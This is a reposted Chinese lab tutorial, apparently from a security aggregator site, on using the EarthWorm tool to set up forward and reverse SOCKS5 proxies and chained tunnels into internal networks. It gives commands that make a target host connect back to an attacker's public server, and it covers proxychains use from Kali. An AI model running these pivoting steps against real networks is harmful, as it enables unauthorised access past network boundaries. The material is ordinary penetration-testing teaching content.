Sec Hotspot 首页  收藏本站  技术博客  RSS
统计信息
已收录文章数量:8263 篇
已收录公众号数量:89 个
本站文章为爬虫采集,如有侵权请告知
本周热门文章
每日安全动态推送(02-14)   2020.02.14 08:35:03  55
威胁情报周报(2020.2.14)   2020.02.14 17:54:01  42
WiFi6来了,一个时代开启!   2020.02.17 10:47:06  39
[代码审计] - 云购CMS代码审计   2020.02.14 16:45:54  34
等保测评2.0:Windows安全审计   2020.02.15 18:00:01  33
2月春风起|DSRC与白帽黑客线上复工   2020.02.14 20:16:46  33
情人节送女朋友小米10pro怎么样?   2020.02.14 18:40:11  33
已收录微信公众号
网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
使用EW作Socks5代理进行内网穿透
本文来自公众号:弥天安全实验室   2019.11.07 16:16:33


网安引领时代,弥天点亮未来


简介

EarthWorm 是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

主页:http://rootkiter.com/EarthWorm/

ew项目地址:

https://github.com/idlefire/ew


实验环境

【使用场景】

普通网络环境:

1. 目标网络边界存在公网IP且可任意开监听端口:

  • a)./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理

  • b) 攻击机通过访问 目标主机8888 端口使用目标主机提供的代理

2. 目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理

  • a) ./ew -s rcsocks -l 1080 -e 8888 // 在公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机

  • b) ./ew -s rssocks -d 1.1.1.1 -e 8888 // 将目标网络的可控边界主机反向连接公网主机8888端口

  • c) 攻击机可通过访问公网主机1080 端口使用 rssocks 主机提供的 socks5 代理服务


实验演示

使用EW做反向Socks5代理

1.在公网服务器上执行以下命令:

./ew_for_linux64-s rcsocks -l 1080 -e 1024


监听本机的1080端口转发到反连1024端口的主机

2.在目标机器执行以下命令

.\ew_for_Win.exe-s rssocks -d 97.xx.xx.23 -e 1024


通过socks隧道连接公网IP的1024端口

3.攻击机kali通过proxychins或者浏览器配置socks5代理访问目标内网机器。

第一种: 使用socks代理访问目标内网

使用Python开启web服务

在kali上访问目标内网IP即可访问web服务

使用proxychins访问目标内网

编辑proxychins配置文件

vim /etc/proxychains.conf


然后访问使用proxychains代理访问 127.0.0.1, 就成功了:


二重网络环境:

攻击机: 内网主机 kali A

攻击机: 公网主机 debian B

目标主机A: 目标网络的边界主机,无公网 IP,无法访问特定资源。

目标主机B: 目标网络内部主机,可访问特定资源,却无法回连公网。

A主机可直连 B主机

1.公网主机B添加转接隧道

./ew_for_linux64-s lcx_listen -l 1080 -e 1024


监听本机的1080端口转发到反连1024端口的主机

2.在内网主机B上利用 ssocksd 方式启动 9999 端口的 socks 代理

.\ew_for_Win.exe-s ssocksd -l 9999


3.在内网主机A上通过工具的lcx_slave方式,打通公网主机1024端口和主机B 9999之间的通讯隧道

.\ew_for_Win.exe-s lcx_slave -d 97.64.80.23 -e 1024 -f 192.168.245.131 -g 9999


4.内网攻击主机kali 通过访问公网主机1080端口来使用 内网主机B提供的 socks5 代理

【参数说明】

目前ew提供六种链路状态,可通过 -s 参数选定,分别为:

ssocksd  rcsocks   rssocks

lcx_slave  lcx_tran  lcx_listen

SOCKS5服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。

lcx链路状态用于打通测试主机同 socks 服务器之间的通路。

lcx类别管道:

lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。

lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机

lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。


参考链接

http://rootkiter.com/EarthWorm/

https://github.com/idlefire/ew

https://www.cnblogs.com/Snowming04/p/11647248.html



知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,
予以风动,
必降弥天之润!


弥  天

安全实验室